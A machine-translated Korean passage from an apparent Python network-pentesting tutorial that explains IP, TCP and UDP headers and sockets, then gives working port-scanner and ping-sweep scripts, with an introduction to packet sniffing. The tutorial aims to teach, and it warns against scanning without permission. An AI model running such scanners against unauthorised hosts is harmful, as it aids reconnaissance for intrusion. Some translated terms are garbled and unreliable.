이 오프셋은 원래 IP 패킷에서 조각의 정확한 위치를 알려줍니다.
TTL (Time to Live)
네트워크에서 루핑을 방지하기 위해 모든 패킷은이 패킷이 교차 할 수있는 라우터 (홉) 수를 네트워크에 알려주는 TTL 값 세트와 함께 전송됩니다. 각 홉에서 해당 값은 1 씩 감소하고 값이 0에 도달하면 패킷이 삭제됩니다.
실험 계획안
대상 호스트의 네트워크 계층에이 패킷이 속한 프로토콜, 즉 다음 수준의 프로토콜을 알려줍니다. 예를 들어 ICMP의 프로토콜 번호는 1, TCP는 6, UDP는 17입니다.
헤더 체크섬
이 필드는 전체 헤더의 체크섬 값을 유지하는 데 사용되며 패킷이 오류없이 수신되었는지 확인하는 데 사용됩니다.
소스 주소
패킷 발신자 (또는 소스)의 32 비트 주소입니다.
목적지 주소
패킷 수신자 (또는 대상)의 32 비트 주소입니다.
옵션
IHL 값이 5보다 큰 경우 사용되는 선택적 필드입니다. 이러한 옵션에는 보안, 레코드 경로, 타임 스탬프 등과 같은 옵션에 대한 값이 포함될 수 있습니다.
IPv4에 대해 자세히 알아 보려면이 링크를 참조하십시오 -www.tutorialspoint.com/ipv4/index.htm
IPv6
인터넷 프로토콜 버전 6은 이전 버전 인 IPv4가 네트워크 계층 (계층 -3)에서 작동하는 최신 통신 프로토콜입니다. 엄청난 양의 논리적 주소 공간을 제공하는 것과 함께이 프로토콜은 IPv4의 단점을 해결하는 풍부한 기능을 가지고 있습니다. 다음은 필드 설명과 함께 IPv4 헤더 다이어그램입니다.
버전 (4 비트)
인터넷 프로토콜 (0110)의 버전을 나타냅니다.
트래픽 클래스 (8 비트)
이 8 비트는 두 부분으로 나뉩니다. 가장 중요한 6 비트는 서비스 유형에 사용되어 라우터가이 패킷에 어떤 서비스를 제공해야하는지 알려줍니다. ECN (Explicit Congestion Notification)에는 최하위 2 비트가 사용됩니다.
흐름 레이블 (20 비트)
이 레이블은 통신에 속하는 패킷의 순차적 흐름을 유지하는 데 사용됩니다. 소스는 라우터가 특정 패킷이 특정 정보 흐름에 속함을 식별 할 수 있도록 시퀀스에 레이블을 지정합니다. 이 필드는 데이터 패킷의 재정렬을 방지하는 데 도움이됩니다. 스트리밍 / 실시간 미디어 용으로 설계되었습니다.
페이로드 길이 (16 비트)
이 필드는 특정 패킷이 페이로드에 포함하는 정보의 양을 라우터에 알리는 데 사용됩니다. 페이로드는 확장 헤더와 상위 계층 데이터로 구성됩니다. 16 비트를 사용하면 최대 65535 바이트를 표시 할 수 있습니다. 그러나 확장 헤더에 Hop-by-Hop 확장 헤더가 포함 된 경우 페이로드는 65535 바이트를 초과 할 수 있으며이 필드는 0으로 설정됩니다.
다음 헤더 (8 비트)
이 필드는 확장 헤더의 유형을 나타내는 데 사용되거나 확장 헤더가 없으면 상위 계층 PDU를 나타냅니다. 상위 계층 PDU의 유형 값은 IPv4와 동일합니다.
홉 제한 (8 비트)
이 필드는 네트워크에서 무한 루프 할 패킷을 중지하는 데 사용됩니다. 이것은 IPv4의 TTL과 동일합니다. Hop Limit 필드의 값은 링크 (라우터 / 홉)를 통과 할 때 1 씩 감소합니다. 필드가 0에 도달하면 패킷이 삭제됩니다.
소스 주소 (128 비트)
이 필드는 패킷 발신자의 주소를 나타냅니다.
대상 주소 (128 비트)
이 필드는 의도 된 패킷 수신자의 주소를 제공합니다.
IPv6에 대해 자세히 알아 보려면 다음 링크를 참조하십시오. www.tutorialspoint.com/ipv6/index.htm
TCP (전송 제어 프로토콜) 헤더 아키텍처
TCP는 통신을 시작하기 전에 두 시스템간에 세션이 설정되는 연결 지향 프로토콜이라는 것을 알고 있습니다. 통신이 완료되면 연결이 종료됩니다. TCP는 두 시스템 간의 연결 소켓을 설정하기 위해 3 방향 핸드 셰이크 기술을 사용합니다. 3 방향 핸드 셰이크는 SYN, SYN-ACK 및 ACK의 세 가지 메시지가 두 시스템간에주고받는 것을 의미합니다. 두 시스템, 시작 및 대상 시스템 간의 작업 단계는 다음과 같습니다.
Step 1 − Packet with SYN flag set
먼저 연결을 시작하려는 모든 시스템은 SYN 플래그가 설정된 패킷으로 시작합니다.
Step 2 − Packet with SYN-ACK flag set
이제이 단계에서 대상 시스템은 SYN 및 ACK 플래그가 설정된 패킷을 반환합니다.
Step 3 − Packet with ACK flag set
마지막으로 시작 시스템은 ACK 플래그가 설정된 원래 대상 시스템으로 패킷을 반환합니다.
다음은 필드 설명과 함께 TCP 헤더의 다이어그램입니다.
소스 포트 (16 비트)
전송 장치에서 응용 프로그램 프로세스의 소스 포트를 식별합니다.
대상 포트 (16 비트)
수신 장치에서 응용 프로그램 프로세스의 대상 포트를 식별합니다.
시퀀스 번호 (32 비트)
세션에서 세그먼트의 데이터 바이트 시퀀스 번호입니다.
승인 번호 (32 비트)
ACK 플래그가 설정되면이 번호는 예상되는 데이터 바이트의 다음 시퀀스 번호를 포함하고 수신 된 이전 데이터의 승인으로 작동합니다.
데이터 오프셋 (4 비트)
이 필드는 TCP 헤더의 크기 (32 비트 단어)와 전체 TCP 세그먼트에서 현재 패킷의 데이터 오프셋을 모두 의미합니다.
예약 됨 (3 비트)
향후 사용을 위해 예약되어 있으며 기본적으로 0으로 설정됩니다.
플래그 (각 1 비트)
NS − 명시 적 혼잡 알림 신호 프로세스는이 Nonce Sum 비트를 사용합니다.
CWR − 호스트가 ECE 비트가 설정된 패킷을 수신하면 ECE가 수신되었음을 확인하도록 Congestion Windows Reduced를 설정합니다.
ECE − 두 가지 의미가 있습니다 −
SYN 비트가 0으로 클리어되면 ECE는 IP 패킷에 CE (혼잡 경험) 비트 세트가 있음을 의미합니다.
SYN 비트가 1로 설정된 경우 ECE는 장치가 ECT를 사용할 수 있음을 의미합니다.
URG − 긴급 포인터 필드에 중요한 데이터가있어 처리해야 함을 나타냅니다.
ACK− Acknowledgment 필드가 중요 함을 나타냅니다. ACK가 0으로 해제되면 패킷에 승인이 없음을 나타냅니다.
PSH − 설정된 경우, 버퍼링하지 않고 수신 애플리케이션으로 데이터를 PUSH (오자마자)하도록 수신 스테이션에 요청합니다.
RST − 리셋 플래그에는 다음과 같은 기능이 있습니다 −
들어오는 연결을 거부하는 데 사용됩니다.
세그먼트를 거부하는 데 사용됩니다.
연결을 다시 시작하는 데 사용됩니다.
SYN −이 플래그는 호스트 간의 연결을 설정하는 데 사용됩니다.
FIN−이 플래그는 연결을 해제하는 데 사용되며 이후 더 이상 데이터가 교환되지 않습니다. SYN 및 FIN 플래그가있는 패킷에는 시퀀스 번호가 있으므로 올바른 순서로 처리됩니다.
Windows 크기
이 필드는 두 스테이션 간의 흐름 제어에 사용되며 수신기가 세그먼트에 할당 한 버퍼의 양 (바이트)을 나타냅니다. 즉, 수신기가 예상하는 데이터의 양을 나타냅니다.
Checksum −이 필드에는 헤더, 데이터 및 의사 헤더의 체크섬이 포함됩니다.
Urgent Pointer − URG 플래그가 1로 설정된 경우 긴급 데이터 바이트를 가리 킵니다.
Options− 일반 헤더에 포함되지 않는 추가 옵션을 용이하게합니다. 옵션 필드는 항상 32 비트 단어로 설명됩니다. 이 필드에 32 비트 미만의 데이터가 포함 된 경우 32 비트 경계에 도달하기 위해 나머지 비트를 덮는 데 패딩이 사용됩니다.
TCP에 대해 자세히 알아 보려면이 링크를 참조하십시오 — https://www.tutorialspoint.com/data_communication_computer_network/transmission_control_protocol.htm
UDP (사용자 데이터 그램 프로토콜) 헤더 아키텍처
UDP는 연결 지향 프로토콜 인 TCP와 달리 단순한 연결없는 프로토콜입니다. 최소한의 통신 메커니즘이 필요합니다. UDP에서 수신자는 수신 된 패킷에 대한 승인을 생성하지 않으며 송신자는 전송 된 패킷의 승인을 기다리지 않습니다. 이러한 단점으로 인해이 프로토콜은 신뢰할 수없고 처리가 더 쉬워집니다. 다음은 필드 설명과 함께 UDP 헤더의 다이어그램입니다.
소스 포트
이 16 비트 정보는 패킷의 소스 포트를 식별하는 데 사용됩니다.
목적지 포트
이 16 비트 정보는 대상 컴퓨터에서 응용 프로그램 수준 서비스를 식별하는 데 사용됩니다.
길이
길이 필드는 UDP 패킷의 전체 길이 (헤더 포함)를 지정합니다. 16 비트 필드이고 최소값은 8 바이트, 즉 UDP 헤더 자체의 크기입니다.
체크섬
이 필드는 보내기 전에 보낸 사람이 생성 한 체크섬 값을 저장합니다. IPv4는이 필드를 선택 사항으로 가지고 있으므로 체크섬 필드에 값이 포함되어 있지 않으면 0이되고 모든 비트가 0으로 설정됩니다.
TCP에 대해 자세히 알아 보려면 다음 링크를 참조하십시오. — 사용자 데이터 그램 프로토콜
소켓은 양방향 통신 채널의 끝점입니다. 프로세스 내에서, 동일한 시스템의 프로세스간에 또는 다른 시스템의 프로세스간에 통신 할 수 있습니다. 유사한 메모에서 네트워크 소켓은 인터넷과 같은 컴퓨터 네트워크를 통해 실행되는 두 프로그램 간의 통신 흐름에서 하나의 끝점입니다. 순전히 가상의 것이며 하드웨어를 의미하지는 않습니다. 네트워크 소켓은 IP 주소와 포트 번호의 고유 한 조합으로 식별 할 수 있습니다. 네트워크 소켓은 TCP, UDP 등과 같은 다양한 채널 유형을 통해 구현 될 수 있습니다.
네트워크 프로그래밍에 사용되는 소켓과 관련된 다른 용어는 다음과 같습니다.
도메인
도메인은 전송 메커니즘으로 사용되는 프로토콜 제품군입니다. 이러한 값은 AF_INET, PF_INET, PF_UNIX, PF_X25 등과 같은 상수입니다.
유형
유형은 두 끝점 간의 통신 종류를 의미합니다. 일반적으로 연결 지향 프로토콜의 경우 SOCK_STREAM, 비 연결 프로토콜의 경우 SOCK_DGRAM입니다.
실험 계획안
이것은 도메인 및 유형 내에서 프로토콜의 변형을 식별하는 데 사용할 수 있습니다. 기본값은 0입니다. 일반적으로 생략됩니다.
호스트 이름
이것은 네트워크 인터페이스의 식별자로 작동합니다. 호스트 이름은 문자열, 점으로 구분 된 쿼드 주소 또는 콜론 (및 가능하면 점) 표기법의 IPV6 주소 일 수 없습니다.
포트
각 서버는 하나 이상의 포트에서 호출하는 클라이언트를 수신합니다. 포트는 Fixnum 포트 번호, 포트 번호가 포함 된 문자열 또는 서비스 이름 일 수 있습니다.
소켓 프로그래밍을위한 Python의 소켓 모듈
파이썬에서 소켓 프로그래밍을 구현하려면 소켓 모듈을 사용해야합니다. 다음은 소켓을 만드는 간단한 구문입니다-
import socket
s = socket.socket (socket_family, socket_type, protocol = 0)
여기에서 소켓 라이브러리를 가져 와서 간단한 소켓을 만들어야합니다. 다음은 소켓을 만드는 동안 사용되는 다른 매개 변수입니다.
socket_family − 이것은 앞에서 설명한대로 AF_UNIX 또는 AF_INET입니다.
socket_type − SOCK_STREAM 또는 SOCK_DGRAM입니다.
protocol − 일반적으로 생략되며 기본값은 0입니다.
소켓 방법
이 섹션에서는 다양한 소켓 메서드에 대해 알아 봅니다. 세 가지 다른 소켓 메소드 세트가 아래에 설명되어 있습니다.
- 서버 소켓 방법
- 클라이언트 소켓 방법
- 일반 소켓 방법
서버 소켓 방법
클라이언트-서버 아키텍처에는 서비스를 제공하는 하나의 중앙 집중식 서버가 있으며 많은 클라이언트가 해당 중앙 집중식 서버에서 서비스를받습니다. 클라이언트는 서버에 대한 요청도 수행합니다. 이 아키텍처에서 몇 가지 중요한 서버 소켓 방법은 다음과 같습니다.
socket.bind() −이 방법은 주소 (호스트 이름, 포트 번호)를 소켓에 바인딩합니다.
socket.listen()−이 방법은 기본적으로 소켓에 대한 연결을 수신합니다. TCP 리스너를 시작합니다. 백로 그는 대기중인 최대 연결 수를 지정하는이 메서드의 인수입니다. 최소값은 0이고 최대 값은 5입니다.
socket.accept()− 이것은 TCP 클라이언트 연결을 허용합니다. 쌍 (conn, address)은이 메서드의 반환 값 쌍입니다. 여기에서 conn은 연결에서 데이터를 보내고받는 데 사용되는 새 소켓 객체이고 address는 소켓에 바인딩 된 주소입니다. 이 메서드를 사용하기 전에 socket.bind () 및 socket.listen () 메서드를 사용해야합니다.
클라이언트 소켓 방법
클라이언트-서버 아키텍처의 클라이언트는 서버를 요청하고 서버에서 서비스를받습니다. 이를 위해 클라이언트 전용 방법은 하나뿐입니다.
socket.connect(address)−이 방법은 적극적으로 서버 연결을 적극적으로하거나 간단히 말해서 클라이언트를 서버에 연결합니다. 인수 주소는 서버의 주소를 나타냅니다.
일반 소켓 방법
클라이언트 및 서버 소켓 메서드 외에 소켓 프로그래밍에 매우 유용한 몇 가지 일반적인 소켓 메서드가 있습니다. 일반적인 소켓 방법은 다음과 같습니다.
socket.recv(bufsize)− 이름에서 알 수 있듯이이 방법은 소켓에서 TCP 메시지를 수신합니다. bufsize 인수는 버퍼 크기를 나타내며이 메서드가 한 번에받을 수있는 최대 데이터를 정의합니다.
socket.send(bytes)−이 방법은 원격 머신에 연결된 소켓으로 데이터를 보내는 데 사용됩니다. 인수 bytes는 소켓으로 전송 된 바이트 수를 제공합니다.
socket.recvfrom(data, address)−이 메서드는 소켓에서 데이터를 수신합니다. 이 메서드는 두 쌍 (데이터, 주소) 값을 반환합니다. 데이터는 수신 된 데이터를 정의하고 주소는 데이터를 보내는 소켓의 주소를 지정합니다.
socket.sendto(data, address)− 이름에서 알 수 있듯이이 방법은 소켓에서 데이터를 보내는 데 사용됩니다. 이 메서드는 두 쌍 (데이터, 주소) 값을 반환합니다. 데이터는 전송 된 바이트 수를 정의하고 주소는 원격 시스템의 주소를 지정합니다.
socket.close() -이 방법은 소켓을 닫습니다.
socket.gethostname() −이 메서드는 호스트의 이름을 반환합니다.
socket.sendall(data)−이 방법은 모든 데이터를 원격 머신에 연결된 소켓으로 보냅니다. 오류가 발생할 때까지 부주의하게 데이터를 전송하고 발생하면 socket.close () 메서드를 사용하여 소켓을 닫습니다.
서버와 클라이언트 간의 연결을 설정하는 프로그램
서버와 클라이언트 간의 연결을 설정하려면 두 개의 서로 다른 Python 프로그램을 작성해야합니다. 하나는 서버용이고 다른 하나는 클라이언트 용입니다.
서버 측 프로그램
이 서버 측 소켓 프로그램에서 우리는 socket.bind()특정 IP 주소 및 포트에 바인딩하여 해당 IP 및 포트에서 들어오는 요청을 수신 할 수 있도록하는 메서드입니다. 나중에 우리는socket.listen()서버를 청취 모드로 전환하는 방법. 숫자, 예를 들어 4는socket.listen()방법은 서버가 사용 중이면 4 개의 연결이 계속 대기하고 5 번째 소켓이 연결을 시도하면 연결이 거부됨을 의미합니다. 우리는 사용하여 클라이언트에게 메시지를 보낼 것입니다socket.send()방법. 끝으로 우리는socket.accept() 과 socket.close()각각 연결을 시작하고 닫는 방법. 다음은 서버 측 프로그램입니다-
import socket
def Main():
host = socket.gethostname()
port = 12345
serversocket = socket.socket()
serversocket.bind((host,port))
serversocket.listen(1)
print('socket is listening')
while True:
conn,addr = serversocket.accept()
print("Got connection from %s" % str(addr))
msg = 'Connecting Established'+ "\r\n"
conn.send(msg.encode('ascii'))
conn.close()
if __name__ == '__main__':
Main()
클라이언트 측 프로그램
클라이언트 측 소켓 프로그램에서 소켓 객체를 만들어야합니다. 그런 다음 서버가 실행중인 포트 (이 예에서는 12345)에 연결합니다. 그 후 우리는socket.connect()방법. 그런 다음socket.recv()방법을 사용하면 클라이언트는 서버에서 메시지를받습니다. 마침내socket.close() 메서드는 클라이언트를 닫습니다.
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = socket.gethostname()
port = 12345
s.connect((host, port))
msg = s.recv(1024)
s.close()
print (msg.decode('ascii'))
이제 서버 측 프로그램을 실행하면 터미널에 다음과 같은 출력이 표시됩니다.
socket is listening
Got connection from ('192.168.43.75', 49904)
그리고 클라이언트 측 프로그램을 실행 한 후 다른 터미널에서 다음 출력을 얻습니다.
Connection Established
네트워크 소켓 예외 처리
즉 두 개의 블록이 있습니다 try 과 except네트워크 소켓 예외를 처리하는 데 사용할 수 있습니다. 다음은 예외 처리를위한 Python 스크립트입니다.
import socket
host = "192.168.43.75"
port = 12345
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.bind((host,port))
s.settimeout(3)
data, addr = s.recvfrom(1024)
print ("recevied from ",addr)
print ("obtained ", data)
s.close()
except socket.timeout :
print ("No connection between client and server")
s.close()
산출
위의 프로그램은 다음과 같은 출력을 생성합니다-
No connection between client and server
위의 스크립트에서 먼저 소켓 객체를 만들었습니다. 그 다음에는 서버가 실행중인 호스트 IP 주소와 포트 번호 (이 예에서는 12345)를 제공했습니다. 나중에 try 블록이 사용되고 내부에socket.bind()방법으로 IP 주소와 포트를 바인딩하려고합니다. 우리는 사용하고 있습니다socket.settimeout()클라이언트의 대기 시간을 설정하는 방법으로,이 예에서는 3 초를 설정합니다. 서버와 클라이언트간에 연결이 설정되지 않을 경우 메시지를 인쇄하는 except 블록이 사용됩니다.
포트 스캐닝은 특정 호스트에서 사용할 수있는 열린 포트를 찾기 위해 사용되는 감시 기술로 정의 될 수 있습니다. 네트워크 관리자, 침투 테스터 또는 해커가이 기술을 사용할 수 있습니다. 대상 시스템에서 최대 정보를 얻기 위해 요구 사항에 따라 포트 스캐너를 구성 할 수 있습니다.
이제 포트 스캔을 실행 한 후 얻을 수있는 정보를 고려하십시오.
열린 포트에 대한 정보.
각 포트에서 실행되는 서비스에 대한 정보.
대상 호스트의 OS 및 MAC 주소에 대한 정보입니다.
포트 스캔은 모든 문과 창문을 확인하여 어떤 것이 열려 있는지 확인하여 집에 들어 가려는 도둑과 같습니다. 앞서 논의한 바와 같이 인터넷을 통한 통신에 사용되는 TCP / IP 프로토콜 제품군은 TCP와 UDP라는 두 가지 프로토콜로 구성됩니다. 두 프로토콜 모두 0에서 65535 개의 포트가 있습니다. 따라서 기본적으로 시스템의 불필요한 포트를 닫는 것이 항상 권장되므로 잠글 수있는 문 (포트)은 65000 개 이상입니다. 이 65535 포트는 다음 세 가지 범위로 나눌 수 있습니다.
시스템 또는 잘 알려진 포트 : 0 ~ 1023
사용자 또는 등록 된 포트 : 1024 ~ 49151
동적 또는 개인 포트 : 모두> 49151
소켓을 사용하는 포트 스캐너
이전 장에서 소켓이 무엇인지 논의했습니다. 이제 소켓을 사용하여 간단한 포트 스캐너를 만들 것입니다. 다음은 소켓을 사용하는 포트 스캐너 용 Python 스크립트입니다.
from socket import *
import time
startTime = time.time()
if __name__ == '__main__':
target = input('Enter the host to be scanned: ')
t_IP = gethostbyname(target)
print ('Starting scan on host: ', t_IP)
for i in range(50, 500):
s = socket(AF_INET, SOCK_STREAM)
conn = s.connect_ex((t_IP, i))
if(conn == 0) :
print ('Port %d: OPEN' % (i,))
s.close()
print('Time taken:', time.time() - startTime)
위의 스크립트를 실행하면 호스트 이름을 묻는 메시지가 표시됩니다. 웹 사이트의 이름과 같은 호스트 이름을 제공 할 수 있지만 포트 스캔은 범죄로 간주되거나 범죄로 간주 될 수 있으므로주의해야합니다. 당사는 귀하가 대상으로하는 서버 또는 컴퓨터 소유자의 명시 적 서면 허가없이 웹 사이트 또는 IP 주소에 대해 포트 스캐너를 실행해서는 안됩니다. 포트 스캔은 누군가의 집에 가서 문과 창문을 확인하는 것과 비슷합니다. 그렇기 때문에 localhost 또는 자신의 웹 사이트 (있는 경우)에서 포트 스캐너를 사용하는 것이 좋습니다.
산출
위의 스크립트는 다음 출력을 생성합니다.
Enter the host to be scanned: localhost
Starting scan on host: 127.0.0.1
Port 135: OPEN
Port 445: OPEN
Time taken: 452.3990001678467
출력은 50-500 범위 (스크립트에 제공된대로)에서이 포트 스캐너가 두 개의 포트 (포트 135 및 445가 열려 있음)를 발견했음을 보여줍니다. 이 범위를 변경하고 다른 포트를 확인할 수 있습니다.
ICMP를 사용하는 포트 스캐너 (네트워크의 라이브 호스트)
ICMP는 포트 스캔이 아니지만 호스트가 작동 중인지 확인하기 위해 원격 호스트를 ping하는 데 사용됩니다. 이 스캔은 네트워크에서 여러 라이브 호스트를 확인해야 할 때 유용합니다. 여기에는 ICMP ECHO 요청을 호스트에 보내는 것이 포함되며 해당 호스트가 활성 상태이면 ICMP ECHO 응답을 반환합니다.
ICMP 요청을 보내는 위의 프로세스는 운영 체제의 ping 명령에 의해 제공되는 ping 스캔이라고도합니다.
Ping Sweep의 개념
실제로 하나 또는 다른 의미에서 핑 스위핑은 핑 스위핑이라고도합니다. 유일한 차이점은 핑 스위핑은 특정 네트워크 범위에서 둘 이상의 시스템 가용성을 찾는 절차라는 것입니다. 예를 들어, 전체 IP 주소 목록을 테스트하려는 경우 ping 스캔을 사용하여 즉, 운영 체제의 ping 명령을 사용하여 IP 주소를 하나씩 스캔하는 데 시간이 많이 걸립니다. 이것이 우리가 핑 스윕 스크립트를 사용해야하는 이유입니다. 다음은 핑 스윕을 사용하여 라이브 호스트를 찾는 Python 스크립트입니다.
import os
import platform
from datetime import datetime
net = input("Enter the Network Address: ")
net1= net.split('.')
a = '.'
net2 = net1[0] + a + net1[1] + a + net1[2] + a
st1 = int(input("Enter the Starting Number: "))
en1 = int(input("Enter the Last Number: "))
en1 = en1 + 1
oper = platform.system()
if (oper == "Windows"):
ping1 = "ping -n 1 "
elif (oper == "Linux"):
ping1 = "ping -c 1 "
else :
ping1 = "ping -c 1 "
t1 = datetime.now()
print ("Scanning in Progress:")
for ip in range(st1,en1):
addr = net2 + str(ip)
comm = ping1 + addr
response = os.popen(comm)
for line in response.readlines():
if(line.count("TTL")):
break
if (line.count("TTL")):
print (addr, "--> Live")
t2 = datetime.now()
total = t2 - t1
print ("Scanning completed in: ",total)
위의 스크립트는 세 부분으로 작동합니다. 먼저 IP 주소를 여러 부분으로 분할하여 ping 스윕 스캔을 수행 할 IP 주소 범위를 선택합니다. 그 다음에는 운영 체제에 따라 핑 스위핑 명령을 선택하는 기능을 사용하고 마지막으로 호스트에 대한 응답과 스캐닝 프로세스를 완료하는 데 걸린 시간을 제공합니다.
산출
위의 스크립트는 다음 출력을 생성합니다.
Enter the Network Address: 127.0.0.1
Enter the Starting Number: 1
Enter the Last Number: 100
Scanning in Progress:
Scanning completed in: 0:00:02.711155
위의 출력은 방화벽이 켜져 있고 ICMP 인바운드 설정도 비활성화되어 있기 때문에 라이브 포트가 없음을 보여줍니다. 이러한 설정을 변경 한 후 출력에서 제공되는 1 ~ 100 범위의 라이브 포트 목록을 가져올 수 있습니다.
TCP 스캔을 사용하는 포트 스캐너
TCP 연결을 설정하려면 호스트가 3 방향 핸드 셰이크를 수행해야합니다. 작업을 수행하려면 다음 단계를 따르십시오.
Step 1 − Packet with SYN flag set
이 단계에서 연결을 시작하려는 시스템은 SYN 플래그가 설정된 패킷으로 시작합니다.
Step 2 − Packet with SYN-ACK flag set
이 단계에서 대상 시스템은 SYN 및 ACK 플래그가 설정된 패킷을 반환합니다.
Step 3 − Packet with ACK flag set
마지막으로 시작 시스템은 ACK 플래그가 설정된 원래 대상 시스템으로 패킷을 반환합니다.
그럼에도 불구하고 여기서 제기되는 질문은 ICMP 에코 요청 및 응답 방법 (핑 스윕 스캐너)을 사용하여 포트 스캔을 수행 할 수 있는지 여부입니다. 그러면 왜 TCP 스캔이 필요합니까? 그 뒤에있는 주된 이유는 ICMP ECHO 응답 기능을 끄거나 방화벽을 ICMP 패킷에 사용하면 ping 스윕 스캐너가 작동하지 않고 TCP 스캔이 필요하기 때문입니다.
import socket
from datetime import datetime
net = input("Enter the IP address: ")
net1 = net.split('.')
a = '.'
net2 = net1[0] + a + net1[1] + a + net1[2] + a
st1 = int(input("Enter the Starting Number: "))
en1 = int(input("Enter the Last Number: "))
en1 = en1 + 1
t1 = datetime.now()
def scan(addr):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
socket.setdefaulttimeout(1)
result = s.connect_ex((addr,135))
if result == 0:
return 1
else :
return 0
def run1():
for ip in range(st1,en1):
addr = net2 + str(ip)
if (scan(addr)):
print (addr , "is live")
run1()
t2 = datetime.now()
total = t2 - t1
print ("Scanning completed in: " , total)
위의 스크립트는 세 부분으로 작동합니다. 핑 스윕 스캔을위한 IP 주소의 범위를 부분으로 분할하여 선택합니다. 그 다음에는 소켓을 더 사용하는 주소 스캔 기능을 사용합니다. 나중에 호스트에 대한 응답과 스캔 프로세스를 완료하는 데 걸린 시간을 제공합니다. 결과 = s. connect_ex ((addr, 135)) 문은 오류 표시기를 반환합니다. 작업이 성공하면 오류 표시기는 0이고, 그렇지 않으면 errno 변수의 값입니다. 여기서는 포트 135를 사용했습니다. 이 스캐너는 Windows 시스템에서 작동합니다. 여기서 작동하는 또 다른 포트는 445 (Microsoft-DSActive Directory)이며 일반적으로 열려 있습니다.
산출
위의 스크립트는 다음 출력을 생성합니다.
Enter the IP address: 127.0.0.1
Enter the Starting Number: 1
Enter the Last Number: 10
127.0.0.1 is live
127.0.0.2 is live
127.0.0.3 is live
127.0.0.4 is live
127.0.0.5 is live
127.0.0.6 is live
127.0.0.7 is live
127.0.0.8 is live
127.0.0.9 is live
127.0.0.10 is live
Scanning completed in: 0:00:00.230025
효율성 향상을위한 스레드 포트 스캐너
위의 경우에서 보았 듯이 포트 스캐닝은 매우 느릴 수 있습니다. 예를 들어, 소켓 포트 스캐너를 사용하는 동안 50에서 500까지 포트를 스캔하는 데 걸리는 시간은 452.3990001678467입니다. 속도를 향상시키기 위해 스레딩을 사용할 수 있습니다. 다음은 스레딩을 사용하는 포트 스캐너의 예입니다.
import socket
import time
import threading
from queue import Queue
socket.setdefaulttimeout(0.25)
print_lock = threading.Lock()
target = input('Enter the host to be scanned: ')
t_IP = socket.gethostbyname(target)
print ('Starting scan on host: ', t_IP)
def portscan(port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
con = s.connect((t_IP, port))
with print_lock:
print(port, 'is open')
con.close()
except:
pass
def threader():
while True:
worker = q.get()
portscan(worker)
q.task_done()
q = Queue()
startTime = time.time()
for x in range(100):
t = threading.Thread(target = threader)
t.daemon = True
t.start()
for worker in range(1, 500):
q.put(worker)
q.join()
print('Time taken:', time.time() - startTime)
위의 스크립트에서 Python 패키지에 내장 된 threading 모듈을 가져와야합니다. 스레드 잠금 개념을 사용하고 있습니다.thread_lock = threading.Lock()한 번에 여러 번 수정하지 않도록합니다. 기본적으로 threading.Lock ()은 단일 스레드가 한 번에 변수에 액세스 할 수 있도록합니다. 따라서 이중 수정이 발생하지 않습니다.
나중에 작업자 for 루프에서 작업 (포트)을 가져 오는 threader () 함수를 정의합니다. 그런 다음 포트에 연결하고 결과를 인쇄하기 위해 portscan () 메서드가 호출됩니다. 포트 번호는 매개 변수로 전달됩니다. 작업이 완료되면 q.task_done () 메서드가 호출됩니다.
이제 위의 스크립트를 실행 한 후 50 ~ 500 개의 포트를 스캔하는 속도의 차이를 확인할 수 있습니다. 소켓 포트 스캐너가 localhost의 동일한 포트 수를 스캔하는 데 걸리는 시간 인 452.3990001678467보다 매우 적은 1.3589999675750732 초가 소요되었습니다.
산출
위의 스크립트는 다음 출력을 생성합니다.
Enter the host to be scanned: localhost
Starting scan on host: 127.0.0.1
135 is open
445 is open
Time taken: 1.3589999675750732
스니핑 또는 네트워크 패킷 스니핑은 스니핑 도구를 사용하여 지정된 네트워크를 통과하는 모든 패킷을 모니터링하고 캡처하는 프로세스입니다. 그것은 우리가“전화선을 탭”하고 대화를 알 수있는 형식입니다. 그것은 또한 불린다wiretapping 컴퓨터 네트워크에 적용 할 수 있습니다.
엔터프라이즈 스위치 포트 세트가 열려 있으면 직원 중 한 명이 네트워크의 전체 트래픽을 스니핑 할 수있는 가능성이 너무 많습니다. 동일한 물리적 위치에있는 사람은 누구나 이더넷 케이블을 사용하여 네트워크에 연결하거나 해당 네트워크에 무선으로 연결하여 전체 트래픽을 스니핑 할 수 있습니다.
즉, Sniffing을 사용하면 보호되거나 보호되지 않은 모든 종류의 트래픽을 볼 수 있습니다. 적절한 조건에서 적절한 프로토콜을 사용하면 공격자는 추가 공격에 사용할 수있는 정보를 수집하거나 네트워크 또는 시스템 소유자에게 다른 문제를 일으킬 수 있습니다.
무엇을 냄새 맡을 수 있습니까?
네트워크에서 다음과 같은 민감한 정보를 스니핑 할 수 있습니다.
- 이메일 트래픽
- FTP 비밀번호
- 웹 트래픽
- Telnet 비밀번호
- 라우터 구성
- 채팅 세션
- DNS 트래픽
스니핑은 어떻게 작동합니까?
스니퍼는 일반적으로 시스템의 NIC를 무차별 모드로 전환하여 해당 세그먼트에서 전송 된 모든 데이터를 수신합니다.
무차별 모드는 이더넷 하드웨어, 특히 NIC (네트워크 인터페이스 카드)의 고유 한 방식을 의미하며, NIC가이 NIC로 주소가 지정되지 않은 경우에도 네트워크에서 모든 트래픽을 수신 할 수 있습니다. 기본적으로 NIC는 주소가 지정되지 않은 모든 트래픽을 무시합니다.이 작업은 이더넷 패킷의 대상 주소와 장치의 하드웨어 주소 (MAC)를 비교하여 수행됩니다. 이는 네트워킹에 적합하지만 무차별 모드에서는 연결 문제 또는 트래픽 계정을 진단하기 위해 네트워크 모니터링 및 분석 소프트웨어를 사용하기가 어렵습니다.
스니퍼는 데이터 패킷에 캡슐화 된 정보를 디코딩하여 NIC를 통해 컴퓨터에 대한 모든 트래픽을 지속적으로 모니터링 할 수 있습니다.
스니핑 유형
스니핑은 본질적으로 능동적이거나 수동적 일 수 있습니다. 이제 다양한 유형의 스니핑에 대해 알아 보겠습니다.
패시브 스니핑
수동 스니핑에서는 트래픽이 잠기지 만 어떤 식 으로든 변경되지 않습니다. 패시브 스니핑은 듣기 만 허용합니다. 허브 장치와 함께 작동합니다. 허브 장치에서 트래픽은 모든 포트로 전송됩니다. 허브를 사용하여 시스템을 연결하는 네트워크에서는 네트워크의 모든 호스트가 트래픽을 볼 수 있습니다. 따라서 공격자는 통과하는 트래픽을 쉽게 캡처 할 수 있습니다.
